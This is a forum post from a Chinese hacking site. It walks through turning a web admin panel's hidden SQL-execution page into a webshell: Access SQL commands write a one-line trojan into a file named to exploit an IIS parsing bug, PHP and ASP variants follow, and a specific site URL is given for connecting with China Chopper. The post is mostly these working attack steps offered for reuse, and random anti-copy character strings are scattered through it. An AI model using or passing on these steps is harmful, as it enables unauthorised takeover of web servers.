中国网络渗透测试联盟
标题:
ACCESS执行SQL命令导出一句话SHELL
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
- X# b, O# q: v, [
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
, n# }" L, X7 y3 S. x7 D+ y
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
. T. Y; j( k1 E( T
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
, e5 W$ P: u( B1 T
1.create table cmd (a varchar(50))
- h( J" n1 s, C
2.insert into cmd (a) values (‘‘)
+ i, {$ V, p" |8 l& Y9 z
3.select * into [a] in ‘D:\wwwroot\
www.koohik.com
\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
; v& s4 a% A. ]5 b
(把表cmd的内容导出为物理路径的一个EXCEL文件)
! G1 ^* K6 C8 d; ~7 A6 l
4.drop table cmd
# X/ ]$ e. G8 x: u8 f
利用IIS的BUG成功拿到了WEBSHELL。
) g% ~. \$ x" O: g& o, P; C2 s
' t9 H7 I+ y2 J' b% e& ~
直接菜刀里连接
http://www.chouwazi.com/data/xiao.asp;xiao.xls
一句话
5 h3 x8 N. [/ N( r {
5 |& y; | y2 Y" r: }8 v
SQL语句意思解释:
5 Y: U# l( U( v* N
第一句
/ ]9 z: z6 g& B0 n. l
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
0 p* T0 [2 R: H: [# v/ ]: L
: B& R1 }) D8 w6 R
第二句
. A \* |9 ~& @6 S* I) F
在表cmd的a字段插入一句话木马
: p; Q; C' Y+ @: q( y( e' R
第三句
; j( H6 X6 P& H1 ]8 E/ ~- [
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
7 ]" b! y% t" Y7 Z# V
- A) v. J/ {% C f# z; e
第四句
3 S, z9 Q. F, M) }' J& B
删除建立的cmd表
9 `! P' ~ X" {9 X( O4 ] ^+ ]
1 ~# t( J% S$ C. g
以下内容为测试:
9 ]2 `( B; F+ S0 `
Access利用后台SQL执行命令功能导出WebShell:
$ R; z1 F* D; {0 R! E
这个更简单:
% J+ H) s' e# n2 ^% N5 v& f7 r' e
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
3 z# c" K- M# T) z, A
或者
) I& r) t! F! V& J7 T0 F" f2 u
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
, t7 c0 z* G) ^5 h& O' y
# }, ?) H/ K+ k0 T+ ]+ @
后台有执行SQL语句功能(vote为已知表段)
i/ s: y& |) r6 _6 c* m
希望对大家有所帮助拿shell的又一个思路
4 d( S& w) q7 I f7 t7 a
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2